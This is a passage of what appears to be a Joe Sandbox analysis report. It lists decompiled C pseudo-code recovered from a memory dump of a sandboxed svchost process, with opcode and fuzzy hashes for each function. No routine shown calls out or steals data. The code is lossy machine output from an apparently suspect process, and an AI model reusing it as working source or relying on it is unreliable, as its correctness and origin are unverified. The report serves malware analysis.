                        					_t18 =  *0x31187e0; // 0x0
                        					while(_t18 != 0) {
                        						_t43 = _t18 -  *0x3115cd0; // 0xffffffff
                        						if(_t43 >= 0) {
                        							_t31 =  *0x31187e4; // 0x0
                        							_t18 =  *_t31;
                        							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                        								goto L8;
                        							} else {
                        								 *0x31187e4 = _t18;
                        								 *((intOrPtr*)(_t18 + 4)) = _t35;
                        								L03027055(_t31 + 0xfffffff8);
                        								_t24 =  *0x31187e0; // 0x0
                        								_t18 = _t24 - 1;
                        								 *0x31187e0 = _t18;
                        								continue;
                        							}
                        						}
                        						goto L9;
                        					}
                        				}
                        				L9:
                        				__eflags =  *0x3115cd0;
                        				if( *0x3115cd0 <= 0) {
                        					L03027055(_t37);
                        				} else {
                        					_t30 = _t37 + 8;
                        					_t34 =  *0x31187e8; // 0x0
                        					__eflags =  *_t34 - _t35;
                        					if( *_t34 != _t35) {
                        						goto L8;
                        					} else {
                        						 *_t30 = _t35;
                        						 *((intOrPtr*)(_t30 + 4)) = _t34;
                        						 *_t34 = _t30;
                        						 *0x31187e8 = _t30;
                        						 *0x31187e0 = _t18 + 1;
                        					}
                        				}
                        				 *(_t38 - 4) = 0xfffffffe;
                        				return E0307D0D1(L030B4320());
                        			}















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b59af7537fc0f8e981b7c8776a40b729117290b6661f8a0a59a3b4d021edb6fc
                        • Instruction ID: d227a0c8063efd65feac7a6aac12955cb7b70632aaf593ab7b66a044b36a53d9
                        • Opcode Fuzzy Hash: b59af7537fc0f8e981b7c8776a40b729117290b6661f8a0a59a3b4d021edb6fc
                        • Instruction Fuzzy Hash: BA218B75902720CFC759EF25D2406D8BBF5FB89314B98C2AAC1958B296D730C681CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 34%
                        			E03052397(intOrPtr _a4) {
                        				void* __ebx;
                        				void* __ecx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t11;
                        				void* _t19;
                        				void* _t25;
                        				void* _t26;
                        				intOrPtr _t27;
                        				void* _t28;
                        				void* _t29;
                        
                        				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                        				if( *0x311848c != 0) {
                        					L0304FAD0(0x3118610);
                        					if( *0x311848c == 0) {
                        						E0304FA00(0x3118610, _t19, _t27, 0x3118610);
                        						goto L1;
                        					} else {
                        						_push(0);
                        						_push(_a4);
                        						_t26 = 4;
                        						_t29 = E03052581(0x3118610, 0x30050a0, _t26, _t27, _t28);
                        						E0304FA00(0x3118610, 0x30050a0, _t27, 0x3118610);
                        					}
                        				} else {
                        					L1:
                        					_t11 =  *0x3118614; // 0x0
                        					if(_t11 == 0) {
                        						_t11 = E03064886(0x3001088, 1, 0x3118614);
                        					}
                        					_push(0);
                        					_push(_a4);
                        					_t25 = 4;
                        					_t29 = E03052581(0x3118610, (_t11 << 4) + 0x3005070, _t25, _t27, _t28);
                        				}
                        				if(_t29 != 0) {
                        					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                        					 *((char*)(_t29 + 0x40)) = 0;
                        				}
                        				return _t29;
                        			}















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9764d18240b4b893ac526819b8f46cce1854fdacdeb221fcbf0579cce081f092
                        • Instruction ID: 18311c1cdbfd1bda9c405d8b9820896761151a4e0c1a5dac126c02907db66d76
                        • Opcode Fuzzy Hash: 9764d18240b4b893ac526819b8f46cce1854fdacdeb221fcbf0579cce081f092
                        • Instruction Fuzzy Hash: C211F2717063045BE734EA29DD84B5BB6DDEFD4650F188826FD01AB191CB70D841C758
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E030A46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                        				signed short* _v8;
                        				unsigned int _v12;
                        				intOrPtr _v16;
                        				signed int _t22;
                        				signed char _t23;
                        				short _t32;
                        				void* _t38;
                        				char* _t40;
                        
                        				_v12 = __edx;
                        				_t29 = 0;
                        				_v8 = __ecx;
                        				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                        				_t38 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                        				if(_t38 != 0) {
                        					_t40 = _a4;
                        					 *_t40 = 1;
                        					E0306F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                        					_t22 = _v12 >> 1;
                        					_t32 = 0x2e;
                        					 *((short*)(_t38 + _t22 * 2)) = _t32;
                        					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                        					_t23 = E0305D268(_t38, 1);
                        					asm("sbb al, al");
                        					 *_t40 =  ~_t23 + 1;
                        					L030477F0(_v16, 0, _t38);
                        				} else {
                        					 *_a4 = 0;
                        					_t29 = 0xc0000017;
                        				}
                        				return _t29;
                        			}











                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction ID: 59fd55b72ef24a40995fc5adb3cc42b02686606c1e0b3cdf3a501c916b0cd916
                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction Fuzzy Hash: 5C112576505208BBC701DF5DE8808BEB7B9EFD5300F1080AAF944CB350DA718E51C3A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 42%
                        			E0302C962(char __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t19;
                        				char _t22;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        				char _t32;
                        				char _t34;
                        				intOrPtr _t35;
                        				intOrPtr _t37;
                        				intOrPtr* _t38;
                        				signed int _t39;
                        
                        				_t41 = (_t39 & 0xfffffff8) - 0xc;
                        				_v8 =  *0x311d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                        				_t34 = __ecx;
                        				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                        					_t26 = 0;
                        					E0303EEF0(0x31170a0);
                        					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                        					if(E030AF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                        						L9:
                        						E0303EB70(_t29, 0x31170a0);
                        						_t19 = _t26;
                        						L2:
                        						_pop(_t35);
                        						_pop(_t37);
                        						_pop(_t27);
                        						return E0306B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                        					}
                        					_t29 = _t34;
                        					_t26 = E030AF1FC(_t34, _t32);
                        					if(_t26 < 0) {
                        						goto L9;
                        					}
                        					_t38 =  *0x31170c0; // 0x0
                        					while(_t38 != 0x31170c0) {
                        						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                        						_t38 =  *_t38;
                        						_v12 = _t22;
                        						if(_t22 != 0) {
                        							_t29 = _t22;
                        							 *0x311b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                        							_v12();
                        						}
                        					}
                        					goto L9;
                        				}
                        				_t19 = 0;
                        				goto L2;
                        			}


















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 786ff7ea8730893158926880f4859b8b319114373685705c522084ef9054e0e6
                        • Instruction ID: 51c712f734173da10eb835de1fb5e6b41ef18bab2fd1b3b14a08e2e0271f2673
                        • Opcode Fuzzy Hash: 786ff7ea8730893158926880f4859b8b319114373685705c522084ef9054e0e6
                        • Instruction Fuzzy Hash: 8511E1723117069BDB50EF28ED85AABB7E9BFC9A10B04063EF84597690DB20EC50D7D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E030637F5(void* __ecx, intOrPtr* __edx) {
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t6;
                        				intOrPtr _t13;
                        				intOrPtr* _t20;
                        				intOrPtr* _t27;
                        				void* _t28;
                        				intOrPtr* _t29;
                        
                        				_t27 = __edx;
                        				_t28 = __ecx;
                        				if(__edx == 0) {
                        					E03042280(_t6, 0x3118550);
                        				}
                        				_t29 = E0306387E(_t28);
                        				if(_t29 == 0) {
                        					L6:
                        					if(_t27 == 0) {
                        						E0303FFB0(0x3118550, _t27, 0x3118550);
                        					}
                        					if(_t29 == 0) {
                        						return 0xc0000225;
                        					} else {
                        						if(_t27 != 0) {
                        							goto L14;
                        						}
                        						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                        						goto L11;
                        					}
                        				} else {
                        					_t13 =  *_t29;
                        					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                        						L13:
                        						_push(3);
                        						asm("int 0x29");
                        						L14:
                        						 *_t27 = _t29;
                        						L11:
                        						return 0;
                        					}
                        					_t20 =  *((intOrPtr*)(_t29 + 4));
                        					if( *_t20 != _t29) {
                        						goto L13;
                        					}
                        					 *_t20 = _t13;
                        					 *((intOrPtr*)(_t13 + 4)) = _t20;
                        					asm("btr eax, ecx");
                        					goto L6;
                        				}
                        			}











                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6eff03ec9ce552c543e0d063050656b7a5e7fcf8d41d07f418603c75a35eb40
                        • Instruction ID: 8e23b14ae94353576978c575ed01f3686bc846af98e5b6339b5d9bc6523ef8b6
                        • Opcode Fuzzy Hash: d6eff03ec9ce552c543e0d063050656b7a5e7fcf8d41d07f418603c75a35eb40
                        • Instruction Fuzzy Hash: 020108B99037105FC367CA199A00AAABBEADFC6A5071954E9E8058B228C730C800C7D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0305002D() {
                        				void* _t11;
                        				char* _t14;
                        				signed char* _t16;
                        				char* _t27;
                        				signed char* _t29;
                        
                        				_t11 = E03047D50();
                        				_t27 = 0x7ffe0384;
                        				if(_t11 != 0) {
                        					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				} else {
                        					_t14 = 0x7ffe0384;
                        				}
                        				_t29 = 0x7ffe0385;
                        				if( *_t14 != 0) {
                        					if(E03047D50() == 0) {
                        						_t16 = 0x7ffe0385;
                        					} else {
                        						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        					}
                        					if(( *_t16 & 0x00000040) != 0) {
                        						goto L18;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					if(E03047D50() != 0) {
                        						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					if( *_t27 != 0) {
                        						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                        							goto L5;
                        						}
                        						if(E03047D50() != 0) {
                        							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        						}
                        						if(( *_t29 & 0x00000020) == 0) {
                        							goto L5;
                        						}
                        						L18:
                        						return 1;
                        					} else {
                        						L5:
                        						return 0;
                        					}
                        				}
                        			}









                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction ID: fba338151c0a4b78510820f671456e9e2339a221a5ac9b5ea67a6ae9dec8be0d
                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction Fuzzy Hash: 431126722076809FEB62DB29C944B3A77E8EF80B54F0D04F1ED148B692D329D842D660
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E0303766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                        				char _v8;
                        				void* _t22;
                        				void* _t24;
                        				intOrPtr _t29;
                        				intOrPtr* _t30;
                        				void* _t42;
                        				intOrPtr _t47;
                        
                        				_push(__ecx);
                        				_t36 =  &_v8;
                        				if(E0305F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                        					L10:
                        					_t22 = 0;
                        				} else {
                        					_t24 = _v8 + __ecx;
                        					_t42 = _t24;
                        					if(_t24 < __ecx) {
                        						goto L10;
                        					} else {
                        						if(E0305F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                        							goto L10;
                        						} else {
                        							_t29 = _v8 + _t42;
                        							if(_t29 < _t42) {
                        								goto L10;
                        							} else {
                        								_t47 = _t29;
                        								_t30 = _a16;
                        								if(_t30 != 0) {
                        									 *_t30 = _t47;
                        								}
                        								if(_t47 == 0) {
                        									goto L10;
                        								} else {
                        									_t22 = L03044620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t22;
                        			}











                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction ID: fc2281a61b2367a1b25198a0761c534316a520e1d08e0c0bc0100723b0e4b523
                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction Fuzzy Hash: 010188B2742119ABD730DE5ECC51E9FB7ADEB85A60B140524B908CF250DA30DD0187A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E03029080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                        				intOrPtr* _t51;
                        				intOrPtr _t59;
                        				signed int _t64;
                        				signed int _t67;
                        				signed int* _t71;
                        				signed int _t74;
                        				signed int _t77;
                        				signed int _t82;
                        				intOrPtr* _t84;
                        				void* _t85;
                        				intOrPtr* _t87;
                        				void* _t94;
                        				signed int _t95;
                        				intOrPtr* _t97;
                        				signed int _t99;
                        				signed int _t102;
                        				void* _t104;
                        
                        				_push(__ebx);
                        				_push(__esi);
                        				_push(__edi);
                        				_t97 = __ecx;
                        				_t102 =  *(__ecx + 0x14);
                        				if((_t102 & 0x02ffffff) == 0x2000000) {
                        					_t102 = _t102 | 0x000007d0;
                        				}
                        				_t48 =  *[fs:0x30];
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                        					_t102 = _t102 & 0xff000000;
                        				}
                        				_t80 = 0x31185ec;
                        				E03042280(_t48, 0x31185ec);
                        				_t51 =  *_t97 + 8;
                        				if( *_t51 != 0) {
                        					L6:
                        					return E0303FFB0(_t80, _t97, _t80);
                        				} else {
                        					 *(_t97 + 0x14) = _t102;
                        					_t84 =  *0x311538c; // 0x77496848
                        					if( *_t84 != 0x3115388) {
                        						_t85 = 3;
                        						asm("int 0x29");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						_push(0x2c);
                        						_push(0x30ff6e8);
                        						E0307D0E8(0x31185ec, _t97, _t102);
                        						 *((char*)(_t104 - 0x1d)) = 0;
                        						_t99 =  *(_t104 + 8);
                        						__eflags = _t99;
                        						if(_t99 == 0) {
                        							L13:
                        							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        							if(__eflags == 0) {
                        								E030F88F5(_t80, _t85, 0x3115388, _t99, _t102, __eflags);
                        							}
                        						} else {
                        							__eflags = _t99 -  *0x31186c0; // 0x2801228
                        							if(__eflags == 0) {
                        								goto L13;
                        							} else {
                        								__eflags = _t99 -  *0x31186b8; // 0x0
                        								if(__eflags == 0) {
                        									goto L13;
                        								} else {
                        									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                        									__eflags =  *((char*)(_t59 + 0x28));
                        									if( *((char*)(_t59 + 0x28)) == 0) {
                        										E03042280(_t99 + 0xe0, _t99 + 0xe0);
                        										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                        										__eflags =  *((char*)(_t99 + 0xe5));
                        										if(__eflags != 0) {
                        											E030F88F5(0x31185ec, _t85, 0x3115388, _t99, _t102, __eflags);
                        										} else {
                        											__eflags =  *((char*)(_t99 + 0xe4));
                        											if( *((char*)(_t99 + 0xe4)) == 0) {
                        												 *((char*)(_t99 + 0xe4)) = 1;
                        												_push(_t99);
                        												_push( *((intOrPtr*)(_t99 + 0x24)));
                        												E0306AFD0();
                        											}
                        											while(1) {
                        												_t71 = _t99 + 8;
                        												 *(_t104 - 0x2c) = _t71;
                        												_t80 =  *_t71;
                        												_t95 = _t71[1];
                        												 *(_t104 - 0x28) = _t80;
                        												 *(_t104 - 0x24) = _t95;
                        												while(1) {
                        													L19:
                        													__eflags = _t95;
                        													if(_t95 == 0) {
                        														break;
                        													}
                        													_t102 = _t80;
                        													 *(_t104 - 0x30) = _t95;
                        													 *(_t104 - 0x24) = _t95 - 1;
                        													asm("lock cmpxchg8b [edi]");
                        													_t80 = _t102;
                        													 *(_t104 - 0x28) = _t80;
                        													 *(_t104 - 0x24) = _t95;
                        													__eflags = _t80 - _t102;
                        													_t99 =  *(_t104 + 8);
                        													if(_t80 != _t102) {
                        														continue;
                        													} else {
                        														__eflags = _t95 -  *(_t104 - 0x30);
                        														if(_t95 !=  *(_t104 - 0x30)) {
                        															continue;
                        														} else {
                        															__eflags = _t95;
                        															if(_t95 != 0) {
                        																_t74 = 0;
                        																 *(_t104 - 0x34) = 0;
                        																_t102 = 0;
                        																__eflags = 0;
                        																while(1) {
                        																	 *(_t104 - 0x3c) = _t102;
                        																	__eflags = _t102 - 3;
                        																	if(_t102 >= 3) {
                        																		break;
                        																	}
                        																	__eflags = _t74;
                        																	if(_t74 != 0) {
                        																		L49:
                        																		_t102 =  *_t74;
                        																		__eflags = _t102;
                        																		if(_t102 != 0) {
                        																			_t102 =  *(_t102 + 4);
                        																			__eflags = _t102;
                        																			if(_t102 != 0) {
                        																				 *0x311b1e0(_t74, _t99);
                        																				 *_t102();
                        																			}
                        																		}
                        																		do {
                        																			_t71 = _t99 + 8;
                        																			 *(_t104 - 0x2c) = _t71;
                        																			_t80 =  *_t71;
                        																			_t95 = _t71[1];
                        																			 *(_t104 - 0x28) = _t80;
                        																			 *(_t104 - 0x24) = _t95;
                        																			goto L19;
                        																		} while (_t74 == 0);
                        																		goto L49;
                        																	} else {
                        																		_t82 = 0;
                        																		__eflags = 0;
                        																		while(1) {
                        																			 *(_t104 - 0x38) = _t82;
                        																			__eflags = _t82 -  *0x31184c0;
                        																			if(_t82 >=  *0x31184c0) {
                        																				break;
                        																			}
                        																			__eflags = _t74;
                        																			if(_t74 == 0) {
                        																				_t77 = E030F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                        																				__eflags = _t77;
                        																				if(_t77 == 0) {
                        																					_t74 = 0;
                        																					__eflags = 0;
                        																				} else {
                        																					_t74 = _t77 + 0xfffffff4;
                        																				}
                        																				 *(_t104 - 0x34) = _t74;
                        																				_t82 = _t82 + 1;
                        																				continue;
                        																			}
                        																			break;
                        																		}
                        																		_t102 = _t102 + 1;
                        																		continue;
                        																	}
                        																	goto L20;
                        																}
                        																__eflags = _t74;
                        															}
                        														}
                        													}
                        													break;
                        												}
                        												L20:
                        												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                        												 *((char*)(_t99 + 0xe5)) = 1;
                        												 *((char*)(_t104 - 0x1d)) = 1;
                        												goto L21;
                        											}
                        										}
                        										L21:
                        										 *(_t104 - 4) = 0xfffffffe;
                        										E0302922A(_t99);
                        										_t64 = E03047D50();
                        										__eflags = _t64;
                        										if(_t64 != 0) {
                        											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        										} else {
                        											_t67 = 0x7ffe0386;
                        										}
                        										__eflags =  *_t67;
                        										if( *_t67 != 0) {
                        											_t67 = E030F8B58(_t99);
                        										}
                        										__eflags =  *((char*)(_t104 - 0x1d));
                        										if( *((char*)(_t104 - 0x1d)) != 0) {
                        											__eflags = _t99 -  *0x31186c0; // 0x2801228
                        											if(__eflags != 0) {
                        												__eflags = _t99 -  *0x31186b8; // 0x0
                        												if(__eflags == 0) {
                        													_t94 = 0x31186bc;
                        													_t87 = 0x31186b8;
                        													goto L27;
                        												} else {
                        													__eflags = _t67 | 0xffffffff;
                        													asm("lock xadd [edi], eax");
                        													if(__eflags == 0) {
                        														E03029240(_t80, _t99, _t99, _t102, __eflags);
                        													}
                        												}
                        											} else {
                        												_t94 = 0x31186c4;
                        												_t87 = 0x31186c0;
                        												L27:
                        												E03059B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                        											}
                        										}
                        									} else {
                        										goto L13;
                        									}
                        								}
                        							}
                        						}
                        						return E0307D130(_t80, _t99, _t102);
                        					} else {
                        						 *_t51 = 0x3115388;
                        						 *((intOrPtr*)(_t51 + 4)) = _t84;
                        						 *_t84 = _t51;
                        						 *0x311538c = _t51;
                        						goto L6;
                        					}
                        				}
                        			}





















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5eff09b7df99717c9beadf8fd9ebed4f257d86009ca62966e1315ea0d6c9d628
                        • Instruction ID: 70bbcaae219d0664aff67bf415af1b3f6b97bf515e1aa9ffdcbb24318e602324
                        • Opcode Fuzzy Hash: 5eff09b7df99717c9beadf8fd9ebed4f257d86009ca62966e1315ea0d6c9d628
                        • Instruction Fuzzy Hash: E101F4726122188FC318DF04D980B51BBE9EF86320F254576E501DF691C370DC91CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E030BC450(intOrPtr* _a4) {
                        				signed char _t25;
                        				intOrPtr* _t26;
                        				intOrPtr* _t27;
                        
                        				_t26 = _a4;
                        				_t25 =  *(_t26 + 0x10);
                        				if((_t25 & 0x00000003) != 1) {
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push( *((intOrPtr*)(_t26 + 8)));
                        					_push(0);
                        					_push( *_t26);
                        					E03069910();
                        					_t25 =  *(_t26 + 0x10);
                        				}
                        				if((_t25 & 0x00000001) != 0) {
                        					_push(4);
                        					_t7 = _t26 + 4; // 0x4
                        					_t27 = _t7;
                        					_push(_t27);
                        					_push(5);
                        					_push(0xfffffffe);
                        					E030695B0();
                        					if( *_t27 != 0) {
                        						_push( *_t27);
                        						E030695D0();
                        					}
                        				}
                        				_t8 = _t26 + 0x14; // 0x14
                        				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                        					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                        				}
                        				_push( *_t26);
                        				E030695D0();
                        				return L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                        			}







                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction ID: acddc3796378a205f6214e93a732b0c6b46e7cca68899e946917ca0b3ba31320
                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction Fuzzy Hash: 7F016D76141605BFE621EF65CD90EA2F77DFF94790B044525F21446960CB31ADA1CAA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E030F4015(signed int __eax, signed int __ecx) {
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t10;
                        				signed int _t28;
                        
                        				_push(__ecx);
                        				_t28 = __ecx;
                        				asm("lock xadd [edi+0x24], eax");
                        				_t10 = (__eax | 0xffffffff) - 1;
                        				if(_t10 == 0) {
                        					_t1 = _t28 + 0x1c; // 0x1e
                        					E03042280(_t10, _t1);
                        					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                        					E03042280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x31186ac);
                        					E0302F900(0x31186d4, _t28);
                        					E0303FFB0(0x31186ac, _t28, 0x31186ac);
                        					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                        					E0303FFB0(0, _t28, _t1);
                        					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                        					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                        						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                        					}
                        					_t10 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                        				}
                        				return _t10;
                        			}








                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cb4ce8b564c908d64a2858c82f3af6898da1b6b2a3f4fec6d223a8aca27c0d1
                        • Instruction ID: b617edd4d3c31fcd06799cfd3c9491f17bfa3151a18558daa93aade6f7850de3
